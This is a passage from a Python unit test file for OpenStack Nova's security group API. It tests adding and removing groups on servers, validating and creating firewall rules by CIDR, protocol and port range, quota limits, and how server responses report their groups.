def test_disassociate_by_non_existing_security_group_name(self):
    """Removing an unknown group name yields HTTPNotFound."""
    self.stubs.Set(nova.db, 'instance_get', return_server)
    self.assertEqual(return_server(None, '1'),
                     nova.db.instance_get(None, '1'))
    payload = {'removeSecurityGroup': {'name': 'non-existing'}}

    request = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
    self.assertRaises(webob.exc.HTTPNotFound,
                      self.manager._removeSecurityGroup, request, '1',
                      payload)
def test_disassociate_by_invalid_server_id(self):
    """Removing a group from an invalid server id yields HTTPNotFound."""
    self.stubs.Set(nova.db, 'security_group_get_by_name',
                   return_security_group_by_name)
    payload = {'removeSecurityGroup': {'name': 'test'}}

    request = fakes.HTTPRequest.blank('/v2/fake/servers/invalid/action')
    self.assertRaises(webob.exc.HTTPNotFound,
                      self.manager._removeSecurityGroup, request,
                      'invalid', payload)
def test_disassociate_without_body(self):
    """A null removeSecurityGroup payload yields HTTPBadRequest."""
    self.stubs.Set(nova.db, 'instance_get', return_server)
    payload = {'removeSecurityGroup': None}

    request = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.manager._removeSecurityGroup, request, '1',
                      payload)
def test_disassociate_no_security_group_name(self):
    """A removeSecurityGroup payload without a name yields HTTPBadRequest."""
    self.stubs.Set(nova.db, 'instance_get', return_server)
    payload = {'removeSecurityGroup': {}}

    request = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.manager._removeSecurityGroup, request, '1',
                      payload)
def test_disassociate_security_group_name_with_whitespaces(self):
    """A whitespace-only group name yields HTTPBadRequest."""
    self.stubs.Set(nova.db, 'instance_get', return_server)
    payload = {'removeSecurityGroup': {'name': " "}}

    request = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.manager._removeSecurityGroup, request, '1',
                      payload)
def test_disassociate_non_existing_instance(self):
    """Removing a group from a missing instance yields HTTPNotFound."""
    self.stubs.Set(nova.db, 'instance_get', return_server_nonexistent)
    self.stubs.Set(nova.db, 'security_group_get_by_name',
                   return_security_group_by_name)
    payload = {'removeSecurityGroup': {'name': "test"}}

    request = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
    self.assertRaises(webob.exc.HTTPNotFound,
                      self.manager._removeSecurityGroup, request, '1',
                      payload)
def test_disassociate_non_running_instance(self):
    """Removing a group from a non-running instance succeeds."""
    self.stubs.Set(nova.db, 'instance_get', return_non_running_server)
    self.stubs.Set(nova.db, 'instance_get_by_uuid',
                   return_non_running_server)
    self.stubs.Set(nova.db, 'security_group_get_by_name',
                   return_security_group_by_name)
    payload = {'removeSecurityGroup': {'name': "test"}}

    request = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
    self.manager._removeSecurityGroup(request, '1', payload)
def test_disassociate_already_associated_security_group_to_instance(self):
    """Removing a group that is not on the instance yields HTTPBadRequest."""
    self.stubs.Set(nova.db, 'instance_get', return_server)
    self.stubs.Set(nova.db, 'instance_get_by_uuid',
                   return_server_by_uuid)
    self.stubs.Set(nova.db, 'security_group_get_by_name',
                   return_security_group_without_instances)
    payload = {'removeSecurityGroup': {'name': "test"}}

    request = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.manager._removeSecurityGroup, request, '1',
                      payload)
def test_disassociate(self):
    """Happy path: the group is removed via instance_remove_security_group."""
    self.stubs.Set(nova.db, 'instance_get', return_server)
    self.stubs.Set(nova.db, 'instance_get_by_uuid',
                   return_server_by_uuid)
    # Record the expectation of exactly one instance_remove_security_group
    # call; mox verifies it when the test tears down.
    self.mox.StubOutWithMock(nova.db, 'instance_remove_security_group')
    nova.db.instance_remove_security_group(mox.IgnoreArg(),
                                           mox.IgnoreArg(),
                                           mox.IgnoreArg())
    self.stubs.Set(nova.db, 'security_group_get_by_name',
                   return_security_group_by_name)
    self.mox.ReplayAll()

    body = dict(removeSecurityGroup=dict(name="test"))

    req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
    self.manager._removeSecurityGroup(req, '1', body)
class TestSecurityGroupsV2(TestSecurityGroupsV21):
    """Re-run the v2.1 security group tests against the v2 controllers."""

    # Only the controller classes differ; all test methods are inherited.
    secgrp_ctl_cls = secgroups_v2.SecurityGroupController
    server_secgrp_ctl_cls = secgroups_v2.ServerSecurityGroupController
    secgrp_act_ctl_cls = secgroups_v2.SecurityGroupActionController
class TestSecurityGroupRulesV21(test.TestCase):
secgrp_ctl_cls = secgroups_v21.SecurityGroupRulesController
def setUp(self):
    """Build two template groups and stub db lookups to return them."""
    super(TestSecurityGroupRulesV21, self).setUp()

    self.controller = self.secgrp_ctl_cls()
    # Group ids may be UUID strings or integers depending on the backing
    # security group API.
    if self.controller.security_group_api.id_is_uuid:
        id1 = '11111111-1111-1111-1111-111111111111'
        id2 = '22222222-2222-2222-2222-222222222222'
        self.invalid_id = '33333333-3333-3333-3333-333333333333'
    else:
        id1 = 1
        id2 = 2
        self.invalid_id = '33333333'

    self.sg1 = security_group_template(id=id1)
    self.sg2 = security_group_template(
        id=id2, name='authorize_revoke',
        description='authorize-revoke testing')

    db1 = security_group_db(self.sg1)
    db2 = security_group_db(self.sg2)

    def return_security_group(context, group_id, columns_to_join=None):
        # Serve the two fixture groups; anything else is "not found".
        if group_id == db1['id']:
            return db1
        if group_id == db2['id']:
            return db2
        raise exception.SecurityGroupNotFound(security_group_id=group_id)

    self.stubs.Set(nova.db, 'security_group_get',
                   return_security_group)

    self.parent_security_group = db2
def test_create_by_cidr(self):
    """A rule created with a CIDR echoes that CIDR in its ip_range."""
    sg_rule = security_group_rule_template(cidr='10.2.3.124/24',
                                           parent_group_id=self.sg2['id'])

    request = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
    result = self.controller.create(request,
                                    {'security_group_rule': sg_rule})
    created = result['security_group_rule']
    self.assertNotEqual(created['id'], 0)
    self.assertEqual(created['parent_group_id'], self.sg2['id'])
    self.assertEqual(created['ip_range']['cidr'], "10.2.3.124/24")
def test_create_by_group_id(self):
    """A rule may reference another group as its traffic source."""
    sg_rule = security_group_rule_template(group_id=self.sg1['id'],
                                           parent_group_id=self.sg2['id'])

    request = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
    result = self.controller.create(request,
                                    {'security_group_rule': sg_rule})
    created = result['security_group_rule']
    self.assertNotEqual(created['id'], 0)
    self.assertEqual(created['parent_group_id'], self.sg2['id'])
def test_create_by_same_group_id(self):
    """A second rule for the same source group with different ports is ok."""
    rule1 = security_group_rule_template(group_id=self.sg1['id'],
                                         from_port=80, to_port=80,
                                         parent_group_id=self.sg2['id'])
    # Pre-seed the parent group with the port-80 rule.
    self.parent_security_group['rules'] = [security_group_rule_db(rule1)]

    rule2 = security_group_rule_template(group_id=self.sg1['id'],
                                         from_port=81, to_port=81,
                                         parent_group_id=self.sg2['id'])

    req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
    res_dict = self.controller.create(req, {'security_group_rule': rule2})

    security_group_rule = res_dict['security_group_rule']
    self.assertNotEqual(security_group_rule['id'], 0)
    self.assertEqual(security_group_rule['parent_group_id'],
                     self.sg2['id'])
    self.assertEqual(security_group_rule['from_port'], 81)
    self.assertEqual(security_group_rule['to_port'], 81)
def test_create_none_value_from_to_port(self):
    """Omitting ports with no protocol leaves both ports as None."""
    sg_rule = {'parent_group_id': self.sg1['id'],
               'group_id': self.sg1['id']}
    request = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
    result = self.controller.create(request,
                                    {'security_group_rule': sg_rule})
    created = result['security_group_rule']
    self.assertIsNone(created['from_port'])
    self.assertIsNone(created['to_port'])
    self.assertEqual(created['group']['name'], 'test')
    self.assertEqual(created['parent_group_id'], self.sg1['id'])
def test_create_none_value_from_to_port_icmp(self):
    """Omitting ports with ICMP defaults both ports to -1."""
    sg_rule = {'parent_group_id': self.sg1['id'],
               'group_id': self.sg1['id'],
               'ip_protocol': 'ICMP'}
    request = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
    result = self.controller.create(request,
                                    {'security_group_rule': sg_rule})
    created = result['security_group_rule']
    self.assertEqual(created['ip_protocol'], 'ICMP')
    self.assertEqual(created['from_port'], -1)
    self.assertEqual(created['to_port'], -1)
    self.assertEqual(created['group']['name'], 'test')
    self.assertEqual(created['parent_group_id'], self.sg1['id'])
def test_create_none_value_from_to_port_tcp(self):
    """Omitting ports with TCP defaults to the full 1-65535 range."""
    sg_rule = {'parent_group_id': self.sg1['id'],
               'group_id': self.sg1['id'],
               'ip_protocol': 'TCP'}
    request = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
    result = self.controller.create(request,
                                    {'security_group_rule': sg_rule})
    created = result['security_group_rule']
    self.assertEqual(created['ip_protocol'], 'TCP')
    self.assertEqual(created['from_port'], 1)
    self.assertEqual(created['to_port'], 65535)
    self.assertEqual(created['group']['name'], 'test')
    self.assertEqual(created['parent_group_id'], self.sg1['id'])
def test_create_by_invalid_cidr_json(self):
    """A malformed CIDR (/2433 prefix) is rejected."""
    sg_rule = security_group_rule_template(
        ip_protocol="tcp",
        from_port=22,
        to_port=22,
        parent_group_id=self.sg2['id'],
        cidr="10.2.3.124/2433")
    request = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.controller.create, request,
                      {'security_group_rule': sg_rule})
def test_create_by_invalid_tcp_port_json(self):
    """A TCP from_port above 65535 is rejected."""
    sg_rule = security_group_rule_template(
        ip_protocol="tcp",
        from_port=75534,
        to_port=22,
        parent_group_id=self.sg2['id'],
        cidr="10.2.3.124/24")
    request = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.controller.create, request,
                      {'security_group_rule': sg_rule})
def test_create_by_invalid_icmp_port_json(self):
    """An ICMP code above 255 is rejected."""
    sg_rule = security_group_rule_template(
        ip_protocol="icmp",
        from_port=1,
        to_port=256,
        parent_group_id=self.sg2['id'],
        cidr="10.2.3.124/24")
    request = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.controller.create, request,
                      {'security_group_rule': sg_rule})
def test_create_add_existing_rules_by_cidr(self):
    """Re-adding a CIDR rule that already exists on the group fails."""
    rule = security_group_rule_template(cidr='10.0.0.0/24',
                                        parent_group_id=self.sg2['id'])

    # Pre-seed the parent group with the identical rule.
    self.parent_security_group['rules'] = [security_group_rule_db(rule)]

    req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
    self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
                      req, {'security_group_rule': rule})
def test_create_add_existing_rules_by_group_id(self):
    """Re-adding a source-group rule that already exists fails."""
    # NOTE(review): group_id is the literal 1 rather than self.sg1['id'];
    # presumably fine for duplicate detection here, but it diverges from
    # the uuid-capable ids used elsewhere in this class -- confirm.
    rule = security_group_rule_template(group_id=1)

    # Pre-seed the parent group with the identical rule.
    self.parent_security_group['rules'] = [security_group_rule_db(rule)]

    req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
    self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
                      req, {'security_group_rule': rule})
def test_create_with_no_body(self):
    """A missing request body is rejected."""
    request = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.controller.create, request, None)
def test_create_with_no_security_group_rule_in_body(self):
    """A body lacking the 'security_group_rule' key is rejected."""
    payload = {'test': 'test'}
    request = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.controller.create, request, payload)
def test_create_with_invalid_parent_group_id(self):
    """A malformed parent_group_id is rejected."""
    sg_rule = security_group_rule_template(parent_group_id='invalid')

    request = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.controller.create, request,
                      {'security_group_rule': sg_rule})
def test_create_with_non_existing_parent_group_id(self):
    """A well-formed but unknown parent group id yields HTTPNotFound."""
    sg_rule = security_group_rule_template(
        group_id=None, parent_group_id=self.invalid_id)

    request = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
    self.assertRaises(webob.exc.HTTPNotFound,
                      self.controller.create, request,
                      {'security_group_rule': sg_rule})
def test_create_with_non_existing_group_id(self):
    """A malformed source group id is rejected with HTTPBadRequest."""
    sg_rule = security_group_rule_template(
        group_id='invalid', parent_group_id=self.sg2['id'])

    request = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.controller.create, request,
                      {'security_group_rule': sg_rule})
def test_create_with_invalid_protocol(self):
    """An unrecognised ip_protocol string is rejected."""
    sg_rule = security_group_rule_template(
        ip_protocol='invalid-protocol',
        cidr='10.2.2.0/24',
        parent_group_id=self.sg2['id'])

    request = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.controller.create, request,
                      {'security_group_rule': sg_rule})
def test_create_with_no_protocol(self):
    """Omitting ip_protocol while ports are present is rejected."""
    sg_rule = security_group_rule_template(
        cidr='10.2.2.0/24', parent_group_id=self.sg2['id'])
    del sg_rule['ip_protocol']

    request = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.controller.create, request,
                      {'security_group_rule': sg_rule})
def test_create_with_invalid_from_port(self):
    """A from_port outside the valid range is rejected."""
    sg_rule = security_group_rule_template(
        from_port='666666',
        cidr='10.2.2.0/24',
        parent_group_id=self.sg2['id'])

    request = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.controller.create, request,
                      {'security_group_rule': sg_rule})
def test_create_with_invalid_to_port(self):
    """A to_port outside the valid range is rejected."""
    sg_rule = security_group_rule_template(
        to_port='666666',
        cidr='10.2.2.0/24',
        parent_group_id=self.sg2['id'])

    request = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.controller.create, request,
                      {'security_group_rule': sg_rule})
def test_create_with_non_numerical_from_port(self):
    """A non-numeric from_port is rejected."""
    sg_rule = security_group_rule_template(
        from_port='invalid',
        cidr='10.2.2.0/24',
        parent_group_id=self.sg2['id'])

    request = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.controller.create, request,
                      {'security_group_rule': sg_rule})
def test_create_with_non_numerical_to_port(self):
    """A non-numeric to_port is rejected."""
    sg_rule = security_group_rule_template(
        to_port='invalid',
        cidr='10.2.2.0/24',
        parent_group_id=self.sg2['id'])

    request = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.controller.create, request,
                      {'security_group_rule': sg_rule})
def test_create_with_no_from_port(self):
    """Omitting from_port on a CIDR rule is rejected."""
    sg_rule = security_group_rule_template(
        cidr='10.2.2.0/24', parent_group_id=self.sg2['id'])
    del sg_rule['from_port']

    request = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.controller.create, request,
                      {'security_group_rule': sg_rule})
def test_create_with_no_to_port(self):
    """Omitting to_port on a CIDR rule is rejected."""
    sg_rule = security_group_rule_template(
        cidr='10.2.2.0/24', parent_group_id=self.sg2['id'])
    del sg_rule['to_port']

    request = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.controller.create, request,
                      {'security_group_rule': sg_rule})
def test_create_with_invalid_cidr(self):
    """A CIDR with an out-of-range octet is rejected."""
    sg_rule = security_group_rule_template(
        cidr='10.2.2222.0/24', parent_group_id=self.sg2['id'])

    request = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.controller.create, request,
                      {'security_group_rule': sg_rule})
def test_create_with_no_cidr_group(self):
    """With neither cidr nor source group the rule defaults to 0.0.0.0/0."""
    sg_rule = security_group_rule_template(parent_group_id=self.sg2['id'])

    request = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
    result = self.controller.create(request,
                                    {'security_group_rule': sg_rule})
    created = result['security_group_rule']
    self.assertNotEqual(created['id'], 0)
    self.assertEqual(created['parent_group_id'],
                     self.parent_security_group['id'])
    self.assertEqual(created['ip_range']['cidr'], "0.0.0.0/0")
def test_create_with_invalid_group_id(self):
    """A malformed source group id is rejected."""
    sg_rule = security_group_rule_template(
        group_id='invalid', parent_group_id=self.sg2['id'])

    request = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.controller.create, request,
                      {'security_group_rule': sg_rule})
def test_create_with_empty_group_id(self):
rule = security_group_rule_template(group_id='',
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_with_nonexist_group_id(self):
rule = security_group_rule_template(group_id=self.invalid_id,
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPNotFound, self.controller.create,
req, {'security_group_rule': rule})
def test_create_with_same_group_parent_id_and_group_id(self):
rule = security_group_rule_template(group_id=self.sg1['id'],
parent_group_id=self.sg1['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
res_dict = self.controller.create(req, {'security_group_rule': rule})
security_group_rule = res_dict['security_group_rule']
self.assertNotEqual(security_group_rule['id'], 0)
self.assertEqual(security_group_rule['parent_group_id'],
self.sg1['id'])
self.assertEqual(security_group_rule['group']['name'],
self.sg1['name'])
def _test_create_with_no_ports_and_no_group(self, proto):
rule = {'ip_protocol': proto, 'parent_group_id': self.sg2['id']}
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def _test_create_with_no_ports(self, proto):
rule = {'ip_protocol': proto, 'parent_group_id': self.sg2['id'],
'group_id': self.sg1['id']}
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
res_dict = self.controller.create(req, {'security_group_rule': rule})
security_group_rule = res_dict['security_group_rule']
expected_rule = {
'from_port': 1, 'group': {'tenant_id': '123', 'name': 'test'},
'ip_protocol': proto, 'to_port': 65535, 'parent_group_id':
self.sg2['id'], 'ip_range': {}, 'id': security_group_rule['id']
}
if proto == 'icmp':
expected_rule['to_port'] = -1
expected_rule['from_port'] = -1
self.assertEqual(expected_rule, security_group_rule)
def test_create_with_no_ports_icmp(self):
self._test_create_with_no_ports_and_no_group('icmp')
self._test_create_with_no_ports('icmp')
def test_create_with_no_ports_tcp(self):
self._test_create_with_no_ports_and_no_group('tcp')
self._test_create_with_no_ports('tcp')
def test_create_with_no_ports_udp(self):
self._test_create_with_no_ports_and_no_group('udp')
self._test_create_with_no_ports('udp')
def _test_create_with_ports(self, proto, from_port, to_port):
rule = {
'ip_protocol': proto, 'from_port': from_port, 'to_port': to_port,
'parent_group_id': self.sg2['id'], 'group_id': self.sg1['id']
}
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
res_dict = self.controller.create(req, {'security_group_rule': rule})
security_group_rule = res_dict['security_group_rule']
expected_rule = {
'from_port': from_port,
'group': {'tenant_id': '123', 'name': 'test'},
'ip_protocol': proto, 'to_port': to_port, 'parent_group_id':
self.sg2['id'], 'ip_range': {}, 'id': security_group_rule['id']
}
self.assertEqual(proto, security_group_rule['ip_protocol'])
self.assertEqual(from_port, security_group_rule['from_port'])
self.assertEqual(to_port, security_group_rule['to_port'])
self.assertEqual(expected_rule, security_group_rule)
def test_create_with_ports_icmp(self):
self._test_create_with_ports('icmp', 0, 1)
self._test_create_with_ports('icmp', 0, 0)
self._test_create_with_ports('icmp', 1, 0)
def test_create_with_ports_tcp(self):
self._test_create_with_ports('tcp', 1, 1)
self._test_create_with_ports('tcp', 1, 65535)
self._test_create_with_ports('tcp', 65535, 65535)
def test_create_with_ports_udp(self):
self._test_create_with_ports('udp', 1, 1)
self._test_create_with_ports('udp', 1, 65535)
self._test_create_with_ports('udp', 65535, 65535)
def test_delete(self):
rule = security_group_rule_template(id=self.sg2['id'],
parent_group_id=self.sg2['id'])
def security_group_rule_get(context, id):
return security_group_rule_db(rule)
def security_group_rule_destroy(context, id):
pass
self.stubs.Set(nova.db, 'security_group_rule_get',
security_group_rule_get)
self.stubs.Set(nova.db, 'security_group_rule_destroy',
security_group_rule_destroy)
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules/%s'
% self.sg2['id'])
self.controller.delete(req, self.sg2['id'])
def test_delete_invalid_rule_id(self):
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules' +
'/invalid')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.delete,
req, 'invalid')
def test_delete_non_existing_rule_id(self):
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules/%s'
% self.invalid_id)
self.assertRaises(webob.exc.HTTPNotFound, self.controller.delete,
req, self.invalid_id)
def test_create_rule_quota_limit(self):
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
for num in range(100, 100 + CONF.quota_security_group_rules):
rule = {
'ip_protocol': 'tcp', 'from_port': num,
'to_port': num, 'parent_group_id': self.sg2['id'],
'group_id': self.sg1['id']
}
self.controller.create(req, {'security_group_rule': rule})
rule = {
'ip_protocol': 'tcp', 'from_port': '121', 'to_port': '121',
'parent_group_id': self.sg2['id'], 'group_id': self.sg1['id']
}
self.assertRaises(webob.exc.HTTPForbidden, self.controller.create,
req, {'security_group_rule': rule})
def test_create_rule_cidr_allow_all(self):
rule = security_group_rule_template(cidr='0.0.0.0/0',
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
res_dict = self.controller.create(req, {'security_group_rule': rule})
security_group_rule = res_dict['security_group_rule']
self.assertNotEqual(security_group_rule['id'], 0)
self.assertEqual(security_group_rule['parent_group_id'],
self.parent_security_group['id'])
self.assertEqual(security_group_rule['ip_range']['cidr'],
"0.0.0.0/0")
def test_create_rule_cidr_ipv6_allow_all(self):
rule = security_group_rule_template(cidr='::/0',
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
res_dict = self.controller.create(req, {'security_group_rule': rule})
security_group_rule = res_dict['security_group_rule']
self.assertNotEqual(security_group_rule['id'], 0)
self.assertEqual(security_group_rule['parent_group_id'],
self.parent_security_group['id'])
self.assertEqual(security_group_rule['ip_range']['cidr'],
"::/0")
def test_create_rule_cidr_allow_some(self):
rule = security_group_rule_template(cidr='15.0.0.0/8',
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
res_dict = self.controller.create(req, {'security_group_rule': rule})
security_group_rule = res_dict['security_group_rule']
self.assertNotEqual(security_group_rule['id'], 0)
self.assertEqual(security_group_rule['parent_group_id'],
self.parent_security_group['id'])
self.assertEqual(security_group_rule['ip_range']['cidr'],
"15.0.0.0/8")
def test_create_rule_cidr_bad_netmask(self):
rule = security_group_rule_template(cidr='15.0.0.0/0')
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
class TestSecurityGroupRulesV2(TestSecurityGroupRulesV21):
    # Re-run the v2.1 rule tests against the legacy v2 controller class.
    secgrp_ctl_cls = secgroups_v2.SecurityGroupRulesController
# Fixed instance UUIDs shared by the fake compute stubs below.
UUID1 = '00000000-0000-0000-0000-000000000001'
UUID2 = '00000000-0000-0000-0000-000000000002'
UUID3 = '00000000-0000-0000-0000-000000000003'
def fake_compute_get_all(*args, **kwargs):
    # Stub for compute_api.get_all(): returns two fake instances, each
    # carrying two security groups named 'fake-<instance>-<index>'.
    # args[1] is the request context (matches the real API signature).
    base = {'id': 1, 'description': 'foo', 'user_id': 'bar',
            'project_id': 'baz', 'deleted': False, 'deleted_at': None,
            'updated_at': None, 'created_at': None}
    db_list = [
        fakes.stub_instance(
            1, uuid=UUID1,
            security_groups=[dict(base, **{'name': 'fake-0-0'}),
                             dict(base, **{'name': 'fake-0-1'})]),
        fakes.stub_instance(
            2, uuid=UUID2,
            security_groups=[dict(base, **{'name': 'fake-1-0'}),
                             dict(base, **{'name': 'fake-1-1'})])
    ]
    return instance_obj._make_instance_list(args[1],
                                            objects.InstanceList(),
                                            db_list,
                                            ['metadata', 'system_metadata',
                                             'security_groups', 'info_cache'])
def fake_compute_get(*args, **kwargs):
    # Stub for compute_api.get(): one fake instance (UUID3) with two
    # security groups named 'fake-2-0' and 'fake-2-1'.
    inst = fakes.stub_instance(1, uuid=UUID3,
                               security_groups=[{'name': 'fake-2-0'},
                                                {'name': 'fake-2-1'}])
    return fake_instance.fake_instance_obj(args[1],
               expected_attrs=instance_obj.INSTANCE_DEFAULT_FIELDS, **inst)
def fake_compute_create(*args, **kwargs):
    # Stub for compute_api.create(): (list with one instance, reservation id).
    return ([fake_compute_get(*args, **kwargs)], '')
def fake_get_instances_security_groups_bindings(inst, context, servers):
    """Map each server id to its canned list of security groups."""
    groups = {UUID1: [{'name': 'fake-0-0'}, {'name': 'fake-0-1'}],
              UUID2: [{'name': 'fake-1-0'}, {'name': 'fake-1-1'}],
              UUID3: [{'name': 'fake-2-0'}, {'name': 'fake-2-1'}]}
    # Unknown server ids map to None, matching dict.get's default.
    return {server['id']: groups.get(server['id']) for server in servers}
class SecurityGroupsOutputTestV21(test.TestCase):
    """Verify security groups are embedded in server show/detail/create
    responses when the Security_groups extension is enabled."""
    base_url = '/v2/fake/servers'
    content_type = 'application/json'
    def setUp(self):
        super(SecurityGroupsOutputTestV21, self).setUp()
        fakes.stub_out_nw_api(self.stubs)
        # Route all compute API calls to the module-level fakes above.
        self.stubs.Set(compute.api.API, 'get', fake_compute_get)
        self.stubs.Set(compute.api.API, 'get_all', fake_compute_get_all)
        self.stubs.Set(compute.api.API, 'create', fake_compute_create)
        self.flags(
            osapi_compute_extension=[
                'nova.api.openstack.compute.contrib.select_extensions'],
            osapi_compute_ext_list=['Security_groups'])
        self.app = self._setup_app()
    def _setup_app(self):
        # Overridden by the v2 subclass to use the legacy WSGI app.
        return fakes.wsgi_app_v21(init_only=('os-security-groups', 'servers'))
    def _make_request(self, url, body=None):
        # GET by default; switches to POST when a body is supplied.
        req = webob.Request.blank(url)
        if body:
            req.method = 'POST'
            req.body = self._encode_body(body)
            req.content_type = self.content_type
        req.headers['Accept'] = self.content_type
        res = req.get_response(self.app)
        return res
    def _encode_body(self, body):
        return jsonutils.dumps(body)
    def _get_server(self, body):
        return jsonutils.loads(body).get('server')
    def _get_servers(self, body):
        return jsonutils.loads(body).get('servers')
    def _get_groups(self, server):
        return server.get('security_groups')
    def test_create(self):
        # New servers report the fake instance's groups ('fake-2-<i>').
        image_uuid = 'c905cedb-7281-47e4-8a62-f26bc5fc4c77'
        server = dict(name='server_test', imageRef=image_uuid, flavorRef=2)
        res = self._make_request(self.base_url, {'server': server})
        self.assertEqual(res.status_int, 202)
        server = self._get_server(res.body)
        for i, group in enumerate(self._get_groups(server)):
            name = 'fake-2-%s' % i
            self.assertEqual(group.get('name'), name)
    def test_show(self):
        url = self.base_url + '/' + UUID3
        res = self._make_request(url)
        self.assertEqual(res.status_int, 200)
        server = self._get_server(res.body)
        for i, group in enumerate(self._get_groups(server)):
            name = 'fake-2-%s' % i
            self.assertEqual(group.get('name'), name)
    def test_detail(self):
        # Detail listing shows each server's own groups ('fake-<i>-<j>').
        url = self.base_url + '/detail'
        res = self._make_request(url)
        self.assertEqual(res.status_int, 200)
        for i, server in enumerate(self._get_servers(res.body)):
            for j, group in enumerate(self._get_groups(server)):
                name = 'fake-%s-%s' % (i, j)
                self.assertEqual(group.get('name'), name)
    def test_no_instance_passthrough_404(self):
        # InstanceNotFound from the compute layer surfaces as HTTP 404.
        def fake_compute_get(*args, **kwargs):
            raise exception.InstanceNotFound(instance_id='fake')
        self.stubs.Set(compute.api.API, 'get', fake_compute_get)
        url = self.base_url + '/70f6db34-de8d-4fbd-aafb-4065bdfa6115'
        res = self._make_request(url)
        self.assertEqual(res.status_int, 404)
class SecurityGroupsOutputTestV2(SecurityGroupsOutputTestV21):
    # Same assertions as v2.1, routed through the legacy v2 WSGI app.
    def _setup_app(self):
        return fakes.wsgi_app(init_only=('servers',))
class SecurityGroupsOutputPolicyEnforcementV21(test.NoDBTestCase):
    """Exercise the output controller with a policy rule that does not
    match the request's project.

    NOTE(review): unlike PolicyEnforcementV21 below, these tests assert
    nothing — presumably the output controller is expected not to raise
    when policy denies access; confirm against the controller code.
    """
    def setUp(self):
        super(SecurityGroupsOutputPolicyEnforcementV21, self).setUp()
        self.controller = secgroups_v21.SecurityGroupsOutputController()
        self.req = fakes.HTTPRequest.blank('')
        self.rule_name = "os_compute_api:os-security-groups"
        self.rule = {self.rule_name: "project:non_fake"}
        self.policy.set_rules(self.rule)
    def test_show_policy_failed(self):
        self.controller.show(self.req, None, FAKE_UUID1)
    def test_create_policy_failed(self):
        self.controller.create(self.req, None, {})
    def test_detail_policy_failed(self):
